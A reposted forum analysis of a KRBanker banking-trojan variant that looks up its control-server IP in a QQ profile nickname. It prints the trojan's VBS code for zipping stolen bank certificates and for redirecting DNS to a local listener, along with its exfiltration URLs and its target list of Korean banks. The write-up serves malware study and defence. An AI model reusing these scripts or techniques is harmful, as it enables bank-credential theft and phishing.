吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 11538|回复: 32
收起左侧

[转载] 利用QQ昵称反弹连接木马技术分析

  [复制链接]
Audit 发表于 2015-7-25 18:00
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

安全研究人员最近发现KRBanker家族新变种,其利用腾讯QQ空间的接口获取反弹连接IP,劫持本机DNS,拦截韩国银行网站钓鱼。本文将对其进行详细的分析。

0×01 概况

今天要介绍的是一款利用QQ空间反弹连接的恶意软件,这款软件主要通过溢出套件挂马传播,当通过挂马页面下载到受害机器上,利用QQ空间的信息获取反弹连接的服务器IP信息,通过下载另外的组件拦截韩国相关银行网站.窃取网银相关信息回传服务器。这个恶意软件属于KRBanker家族的新变种( Korea+Banker=KRBanker)攻击流程,如下图所示

首先通过kaixin、 gondad等溢出套件挂马,当访问挂马站点时溢出成功会下载一个EXE,它会安装自启动在目标系统中。查询QQ号的昵称信息,获取命令与控制(command and control)服务器的IP,收集银行证书上传.并篡改本地DNS服务器IP进行域名劫持。

0×02 技术细节

1) 获取控制服务器IP

黑客通过修改QQ昵称信息为木马的控制端IP, 木马通过查询QQ昵称信息的接口获取到昵称信息(nickname),就获得了控制IP.进而反向连接控制服务器,接收恶意指令。

通过QQ空间的API获取IP,nikename被设置为控制端IP

例如:其中 uin=为QQ号码

请求http://r.qzone.qq.com/cgi-bin/user/cgi_personal_card?uin=1474897680?=6330

返回信息

_Callback({"uin":1474897680,"qzone":0,"intimacyScore":0,"nickname":"61.228.32.148","realname":"","smartname":"","friendship":0,"isFriend":0,"bitmap":"08009c8002000101","avatarUrl":http://qlogo1.store.qq.com/qzone/1474897680/1474897680/100});

如果用QQ查询可以直观的看到昵称被设置成IP格式:

黑客这么做的目的是利用QQ昵称保存IP信息,达到和动态域名相同的效果,一旦IP被封可以立即修改IP.同时也避免了使用动态域名被拦截的情况,比如国内的3322,f3322 等已经引起安全警惕。而采用qq空间网站域名,可以绕过针对域名拦截的IDS设备,顺利查询到控制IP。

获取C&C的IP后,获取本地MAC信息提交,如格式http://ip/Count.asp?ver=001&mac=xx-xx-xx-xx-xx-xx

2) 窃取证书上传

目前的网银保护机制主要包括密码,数字证书,手机短信,由于韩国的网银主要使用IE浏览器,并使用Activex作开发.其数字证书主要保存在磁盘上,位置包括%ProgramFiles%\NPKI和其他的U盘目录如下:

%DriveLetter%\NPKI%ProgramFiles%\NPKI%SystemDrive%\Documentsand Settings\All Users\Application Data\LocalLow\NP

该KRBanker变种会从这些NPKI目录中收集数字证书文件。遍历磁盘查询包含NPKI名称的文件夹

使用使用VBS脚本窃取主机内的证书,打包成ZIP文件

VBS脚本如下:

Sub Zip(ByVal mySourceDir, ByVal myZipFile)Set fso = CreateObject("Scripting.FileSystemObject")If fso.GetExtensionName(myZipFile) <>  "zip"ThenExitSubElseIf fso.FolderExists(mySourceDir) ThenFType = "Folder"ElseIf fso.FileExists(mySourceDir) ThenFType = "File"FileName = fso.GetFileName(mySourceDir)  FolderPath = Left(mySourceDir, Len(mySourceDir)  - Len(FileName))ElseExitSubEndIfSet f = fso.CreateTextFile(myZipFile,  True)f.Write "PK" & Chr(5) & Chr(6) & String(18, Chr(0))f.CloseSet objShell = CreateObject("Shell.Application")SelectCase FtypeCase"Folder"Set objSource = objShell.NameSpace(mySourceDir)  Set objFolderItem = objSource.Items()Case"File"Set objSource = objShell.NameSpace(FolderPath)  Set objFolderItem = objSource.ParseName(FileName)  EndSelectSet objTarget = objShell.NameSpace(myZipFile)  intOptions = 256objTarget.CopyHere objFolderItem, intOptionsDoWScript.Sleep 1000LoopUntil objTarget.Items.Count > 0EndSub

在临时目录生成zip文件

开始回传收集的zip文件,回传URL地址为http://61.228.32.*/upload.php

协议类型: POST,name为upload_file1,分割特征为—–7da3e1bd0314

3)拦截银行网站和搜索门户

黑客还会通过拦截银行网站进行钓鱼,从而获取银行帐户密码等详细信息从而获得权限来访问受害者的账户.

DNS拦截过程主要分为两个步骤:

步骤1.修改DNS服务器设置为本机

修改的VBS脚本代码如下:

strGatewayMetric= Array(1)arrDNSServers= Array("127.0.0.1","8.8.8.8")strComputer= "."SetobjWMIService = GetObject("winmgmts:" _&"{impersonationLevel=impersonate}!\\" & strComputer &"\root\cimv2")SetcolNetAdapters = objWMIService.ExecQuery _("Select* from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")ForEach objNetAdapter in colNetAdapterserrEnable= objNetAdapter.EnableStatic(strIPAddress, strSubnetMask)errGateways= objNetAdapter.SetGateways(strGateway, strGatewaymetric)errDNS= objNetAdapter.SetDNSServerSearchOrder(arrDNSServers)IferrEnable = 0 ThenEndIfNext

设置主DNS服务器的地址为127.0.0.1


步骤2.监听本机53端口过滤拦截域名请求

通过端口查看工具可以看到恶意进程监听了本机0.0.0.0:53端口.



由于Krbanker木马将首选DNS服务器设置为127.0.0.1,这样所有的DNS请求将会转发给本机的53端口. Krbanker木马接收到域名请求会判断是否需要劫持域名,如果不需要劫持就构造一个域名查询的数据包直接发送到8.8.8.8获取真实IP反馈.如果需要劫持就篡改到钓鱼站点. 拦截的银行包括韩国农协银行(NH Bank)、新韩银行,友利银行、韩亚银行、国民银行、韩国外换银行、韩国中小企业银行、邮政银行。同时拦截韩国的综合性入口网站.包括Naver、Nate、Daum.拦截的网站域名如下:

www.nonghyup.comnonghyup.combanking.nonghyup.comwww.nonghyup.co.krnonghyup.co.krbanking.nonghyup.co.krwww.shinhan.comshinhan.comwww.shinhanbank.comshinhanbank.comwww.shinhanbank.co.krshinhanbank.co.krbanking.shinhanbank.combanking.shinhan.combanking.shinhanbank.co.krwww.hanabank.comhanabank.comwww.hanabank.co.krhanabank.co.krwww.wooribank.comwooribank.comwww.wooribank.krwooribank.krwww.wooribank.co.krwooribank.co.krwww.kbstar.comkbstar.comwww.kbstar.co.krkbstar.co.krwww.keb.co.krkeb.co.krebank.keb.co.kronline.keb.co.krwww.ibk.co.kribk.co.krwww.ibk.kribk.krmybank.ibk.co.krbanking.ibk.co.krwww.kfcc.co.krkfcc.co.krwww.kfcc.comkfcc.comwww.epostbank.co.krepostbank.co.krwww.epost.krepost.krwww.epostbank.krepostbank.krwww.naver.comnaver.comwww.naver.netnaver.netwww.naver.co.krnaver.co.krwww.nate.comnate.comwww.nate.netnate.netwww.nate.krnate.krwww.nate.co.krnate.co.krwww.daum.netdaum.netwww.daum.co.krdaum.co.kr

这些域名是加密保存在EXE当中,运行后解密用于拦截匹配.

0×03 总结

利用QQ这种方式传递信息和国外恶意代码利用社交网站做信息中转类似,都是为了躲避IDS的检测,同时具有良好的稳定性.在钓鱼拦截方面之前的krbanker家族采用的是hosts文件修改方法,而新的变种采用了本机53端口监听方式进行劫持更加隐蔽。

0×04 参考链接

[1]http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-120510-3326-99

[2]http://malware-traffic-analysis.net/2014/12/13/index.html

[3]http://www.malware-traffic-analysis.net/2015/01/31/index.html

[4]https://www.hybrid-analysis.com/sample/e9c6b5ba7083295562dd4ce0d1767e48a30267111bf486d6bb84421fa28542dd/

[5]http://intumyself.tistory.com/m/post/371

[6]http://www.wooyun.org/bugs/wooyun-2010-09633

[7]http://www.secdoctor.com/html/sec/23715.html

[8]http://www.freebuf.com/news/54637.html


点评

看我15楼评论  发表于 2015-7-25 19:02

免费评分

参与人数 3热心值 +3 收起 理由
jxzw + 1 我很赞同!
彭半仙 + 1 鼓励转贴优秀软件安全工具和文档!
雨夕 + 1 热心回复!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

smile1110 发表于 2015-7-25 18:59
本帖最后由 smile1110 于 2015-7-25 19:00 编辑

无非就是随着控制端QQ昵称改变来随时改变反弹木马的主动连接的请求发包的ip,变相成为了动态ip上线,但是QQ号码是固定的,这就是实现了的类似咱们以前普遍在用的动态域名上线方式,而这个最大特色在于TX的地址是普遍受到保护的,而且这个行为也是普遍被杀软忽视的,本文全程看着非常先进,其实不然,该木马最大的缺陷在于是反弹式木马首先这个发包可以被目前99%非静默状态防火墙提示,甚至可以直接拦截,那该木马也就是失去了实际作用,这种技术还不算高,俺早年看到一款土耳其概念式木马,人家用网站上面的导航栏挂件来实现反弹连接,更牛b在于什么flash漏洞啊,解析漏洞啊,各种xss跨站啊啊,各种形式获取你的cookies啊,你只要访问那个网页层出不穷的挂马方式,这个木马我06年看到的,现在时隔9年,仍然比这个利用QQ昵称获取控制端ip上线的先进的多

点评

666666666666666  发表于 2015-11-5 03:28

免费评分

参与人数 3热心值 +3 收起 理由
感情 + 1 666666666666666
crazistian + 1 我很赞同!
羅少 + 1 666

查看全部评分

Caraciold_Jr 发表于 2015-7-25 18:33
563198647 发表于 2015-7-25 18:09
吃兔子de胡萝卜 发表于 2015-7-25 18:12
好高深啊
虽然不懂还是顶下

点评

看我15楼评论  发表于 2015-7-25 19:01
canluo 发表于 2015-7-25 18:13
我也看不懂啊
维多利加 发表于 2015-7-25 18:13
同上....
惜亿网络 发表于 2015-7-25 18:15
  没看懂   支持一下
北涯丶 发表于 2015-7-25 18:26
反正看不懂就水一贴吧
璃梦花殇 发表于 2015-7-25 18:30 来自手机
好深奥,没看懂。
亿联网络 发表于 2015-7-25 18:36
QQ昵称远程木马啊  好高端啊
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 11:25

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表